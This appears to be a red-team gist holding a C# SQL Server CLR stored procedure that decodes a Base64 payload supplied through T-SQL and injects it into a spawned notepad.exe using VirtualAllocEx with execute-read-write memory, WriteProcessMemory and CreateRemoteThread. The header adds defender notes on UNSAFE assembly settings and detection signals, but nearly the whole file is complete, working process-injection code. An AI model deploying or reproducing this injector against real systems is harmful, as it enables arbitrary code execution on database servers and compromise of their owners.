@RedTeams
Created July 21, 2019 18:58
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
/// <summary>
/// SQL CLR stored procedure that decodes a Base64 argument and injects the
/// resulting bytes into a freshly started notepad.exe via the classic
/// CreateProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
/// sequence. Everything below the struct definitions is raw Win32 P/Invoke.
///
/// Defender notes:
/// - Because the procedure P/Invokes kernel32, the hosting assembly must be
///   catalogued with PERMISSION_SET = UNSAFE. That requires the instance-level
///   "clr enabled" option and either a TRUSTWORTHY database whose owner holds
///   UNSAFE ASSEMBLY, or a trusted-assembly entry when "clr strict security"
///   is on. Audit those settings and the assembly catalogue (sys.assemblies)
///   for unexpected UNSAFE assemblies.
/// - Host-level signals: the SQL Server service process spawning notepad.exe,
///   a cross-process allocation with PAGE_EXECUTE_READWRITE, and a remote
///   thread whose start address lies inside that allocation.
/// - The child process is never terminated and no handle is closed, so the
///   injected notepad.exe remains as a live artifact for responders.
/// </summary>
public partial class StoredProcedures
{
// Mirrors the Win32 PROCESS_INFORMATION structure filled in by CreateProcess.
// Only hProcess is read by ExecutePayload; the other fields are never used here.
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
// Mirrors the Win32 STARTUPINFOW structure (Unicode char set). ExecutePayload
// sets only cb (the structure size); every other field stays at its default.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
// kernel32!CreateProcessW. Parameter names here do not follow the Win32
// names (e.g. Application is lpApplicationName); the positional order does.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool CreateProcess
(
string Application,
string lpCommandLine,
IntPtr SecurityAttributes,
IntPtr lpThreadAttributes,
bool bHandles,
uint CreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref STARTUPINFO lpStartup,
out PROCESS_INFORMATION lpProcessInformation
);
// kernel32!VirtualAllocEx: reserves/commits memory inside another process.
// Returns IntPtr.Zero on failure; the caller checks GetLastWin32Error.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAllocEx
(
IntPtr hProcess,
IntPtr lpAddress,
int dwSize,
uint flAllocationType,
uint MemoryProtection
);
// kernel32!WriteProcessMemory: copies `size` bytes from lpBuffer (a buffer in
// this process) into the target process at lpBaseAddress.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory
(
IntPtr hProcess,
IntPtr lpBaseAddress,
IntPtr lpBuffer,
int size,
out int written
);
// kernel32!CreateRemoteThread: starts a thread in the target process at
// lpStartAddress. This is the step that makes the copied bytes execute.
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr CreateRemoteThread
(
IntPtr hProcess,
IntPtr lpThreadAttributes,
uint StackSize,
IntPtr lpStartAddress,
IntPtr lpParameter,
uint dwCreationFlags,
out IntPtr threadId
);
/// <summary>
/// Entry point exposed to T-SQL. Decodes <paramref name="arg"/> from Base64,
/// launches notepad.exe, copies the decoded bytes into it and runs them on a
/// remote thread. Failures are reported back to the SQL client as plain text
/// through SqlContext.Pipe rather than as exceptions.
/// </summary>
/// <param name="arg">Base64-encoded bytes supplied by the T-SQL caller.
/// Convert.FromBase64String throws FormatException on malformed input, which
/// surfaces to the client as a CLR error.</param>
[Microsoft.SqlServer.Server.SqlProcedure]
public static void ExecutePayload (string arg)
{
SqlPipe pipe = SqlContext.Pipe;
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
si.cb = Marshal.SizeOf(si);
int written = 0;
IntPtr threadid = IntPtr.Zero;
var bytes = Convert.FromBase64String(arg);
// The child is created with inherited handles (bHandles = true) and no
// creation flags, so it runs immediately as a visible child of the SQL
// Server service process -- a strong parent/child detection signal.
if (!CreateProcess("C:\\Windows\\System32\\notepad.exe", null, IntPtr.Zero, IntPtr.Zero, true, 0, IntPtr.Zero, null, ref si, out pi))
{
pipe.Send("Failed to start process");
return;
}
// Local unmanaged copy of the decoded bytes; it is never freed.
IntPtr buffer = Marshal.AllocHGlobal(bytes.Length);
Marshal.Copy(bytes, 0, buffer, bytes.Length);
IntPtr RemoteBuffer = IntPtr.Zero;
// 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE. An RWX commit in a
// remote process is the allocation pattern memory-scanning tools key on.
RemoteBuffer = VirtualAllocEx(pi.hProcess, IntPtr.Zero, bytes.Length, 0x1000, 0x40);
if(RemoteBuffer == IntPtr.Zero)
{
pipe.Send("Failed @ VirtualAllocEx with error : " + Marshal.GetLastWin32Error().ToString());
return;
}
// `written` is received but never compared against bytes.Length.
if (!WriteProcessMemory(pi.hProcess, RemoteBuffer, buffer, bytes.Length, out written))
{
pipe.Send("Failed @ WriteProcessMemory with error : " + Marshal.GetLastWin32Error().ToString());
return;
}
// Thread start address is the remote buffer itself. The returned handle and
// threadid are discarded, and neither pi.hProcess nor pi.hThread is closed.
CreateRemoteThread(pi.hProcess, IntPtr.Zero, 0, RemoteBuffer, IntPtr.Zero, 0, out threadid);
}
}